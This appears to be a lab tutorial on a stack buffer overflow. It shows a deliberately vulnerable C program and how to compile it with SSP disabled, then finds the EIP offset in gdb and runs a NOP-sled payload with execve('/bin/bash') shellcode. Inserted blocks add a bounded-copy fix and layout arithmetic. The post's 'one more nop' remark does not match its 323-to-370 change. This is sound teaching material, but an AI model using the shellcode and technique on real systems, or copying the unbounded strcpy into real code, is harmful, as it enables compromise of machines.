Script program (prog.c):

// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    strcpy(buffer, argv[1]); // Vulnerable function!
    return 0;
}
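As an added example that is not part of the original post, here is the same unbounded strcpy() pattern beside a bounded copy that rejects any argument that does not fit the buffer. BUF_SIZE matches the 500-byte buffer in prog.c; the function names and the 1024-byte scratch limit in the test helper are my own choices.

```c
/* Added example, not from the original post: prog.c's strcpy() into a
 * fixed buffer, beside a bounded copy that refuses oversized input.
 * BUF_SIZE matches prog.c's 500-byte buffer; function names are mine. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500

/* Bounded copy: returns 0 on success, -1 if src plus its NUL does not fit
 * in dst. memchr() bounds the scan to dst_size bytes, so a too-long src is
 * never copied, and strncpy()'s missing-terminator pitfall is avoided. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)            /* no terminator within dst_size: too long */
        return -1;
    memcpy(dst, src, (size_t)(nul - src) + 1);  /* length includes the NUL */
    return 0;
}

/* Same shape as main() in prog.c, but with the copy bounded. Returns the
 * number of bytes copied, or -1 when the argument is missing or rejected. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    if (arg == NULL)            /* prog.c reads argv[1] without an argc check */
        return -1;
    if (copy_arg_checked(buffer, sizeof buffer, arg) != 0)
        return -1;
    return (int)strlen(buffer);
}

/* Constructed input: a run of `len` 'A' bytes, like a fuzzer's payloads.
 * Capped below 1024 so the scratch buffer here is itself never overrun. */
int handle_arg_of_len(size_t len)
{
    char scratch[1024];
    if (len >= sizeof scratch)
        return -1;
    memset(scratch, 'A', len);
    scratch[len] = '\0';
    return handle_arg(scratch);
}

int main(int argc, char **argv)
{
    int n = handle_arg(argc > 1 ? argv[1] : NULL);
    if (n < 0)
        printf("rejected: argument missing or longer than %d bytes\n", BUF_SIZE - 1);
    else
        printf("copied %d bytes\n", n);
    return 0;
}
```

With this version the 508-byte input used later in the post is simply rejected instead of reaching the saved return address; compiling without "-fno-stack-protector" keeps SSP enabled as a second line of defence, independent of the copy being bounded.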
It's time to compile the C program that was created earlier.
root@bt:~/linuxexp# gcc -ggdb -o prog prog.c
Turn SSP (the stack-smashing protector) off by adding "-fno-stack-protector" to the gcc command when compiling:
root@bt:~/linuxexp# gcc -o prog -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 prog.c
Now create a fuzzer to find the offset needed to overwrite EIP; at 508 bytes we can see EIP being overwritten.
Next we look for an address just before ESP at the point where strcpy is called, by subtracting 200 from the value we get: we take the address of ESP and go back 200 bytes into the buffer. So let's find the address of ESP and subtract 200 from it.
Using the "list" command in gdb we take a look at the source code, then we put a breakpoint at the vulnerable function, run the program normally and find out the address of our ESP.
So ESP is 0xbffff26c (make sure you try it at least 2 times like in my example, just to make sure). If we subtract 200 from ESP we get: 0xbffff26c - 200 = 0xbffff06c.
Cool, now we know the address to overwrite EIP with, and we know that we need 508 bytes to reach EIP, so let's see how we could build the exploit.
(gdb) run $(python -c 'print "\x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x78\x39\x30\x78" * 35')
Our EIP gets overwritten with 0x78303978 … doesn't this look familiar!? We are trying to overwrite it with 0x78303978. This is just a small issue, so let's quickly add one more nop and relaunch the exploit.
(gdb) run $(python -c 'print "\x90"*370 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x78\x39\x30\x78" * 35')
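To see why the debugger reported 0x78303978 after the first command, and what the sled size change in the second command does to the 4-byte marker, here is an added example (my own code, not from the post) that works through the post's layout arithmetic. It assumes the saved EIP occupies bytes 504..507 of the input (the post's "508 bytes to overwrite EIP"), that the post's shellcode string is 45 bytes (counted from the escapes above), and that the marker is the post's "\x78\x39\x30\x78"; the shellcode contents are not modelled, only their length.

```c
/* Added example, not from the original post: models where each part of
 * the post's input lands in the stack frame. Assumptions: saved EIP at
 * bytes 504..507; shellcode length 45 (counted from the post's string);
 * 35 copies of the marker "\x78\x39\x30\x78". Function names are mine. */
#include <stdio.h>
#include <stddef.h>

#define EIP_OFFSET     504u   /* 500-byte buffer + 4-byte saved EBP */
#define SHELLCODE_LEN   45u   /* byte count of the post's shellcode */
#define MARKER_COPIES   35u

static const unsigned char MARKER[4] = { 0x78, 0x39, 0x30, 0x78 };

/* Total length of the input for a given NOP-sled size. */
size_t payload_len(size_t nops)
{
    return nops + SHELLCODE_LEN + 4 * MARKER_COPIES;
}

/* Byte the input places at position `pos`: NOP in the sled, a stand-in
 * byte (0xCC) for the unmodelled shellcode body, then the repeating marker. */
unsigned char payload_byte(size_t nops, size_t pos)
{
    if (pos < nops)
        return 0x90;
    if (pos < nops + SHELLCODE_LEN)
        return 0xCC;
    return MARKER[(pos - nops - SHELLCODE_LEN) % 4];
}

/* The 32-bit value that ends up in the saved-EIP slot, read little-endian
 * as the CPU would; 0 if the input is too short to reach the slot. */
unsigned int eip_value(size_t nops)
{
    unsigned int v = 0;
    if (payload_len(nops) < EIP_OFFSET + 4)
        return 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | payload_byte(nops, EIP_OFFSET + (size_t)i);
    return v;
}

/* 1 if a whole 4-byte marker copy starts exactly at the EIP slot, i.e. the
 * marker region begins at or before the slot on a 4-byte boundary from it. */
int marker_aligned(size_t nops)
{
    size_t start = nops + SHELLCODE_LEN;
    return start <= EIP_OFFSET && (EIP_OFFSET - start) % 4 == 0;
}

int main(void)
{
    size_t sleds[2] = { 323, 370 };   /* the two sled sizes used in the post */
    for (int i = 0; i < 2; i++)
        printf("nops=%zu total=%zu eip=0x%08x aligned=%d\n",
               sleds[i], payload_len(sleds[i]), eip_value(sleds[i]),
               marker_aligned(sleds[i]));
    return 0;
}
```

With 323 NOPs the marker region starts at byte 368, exactly 136 bytes (34 copies) before the EIP slot, so the slot holds one whole copy and reads back as 0x78303978, matching the post. Changing the sled to 370 moves the marker start to byte 415, which is no longer a multiple of 4 away from the slot, so the slot receives a rotated copy; any value later put in place of the marker needs the same 4-byte alignment check before it is used.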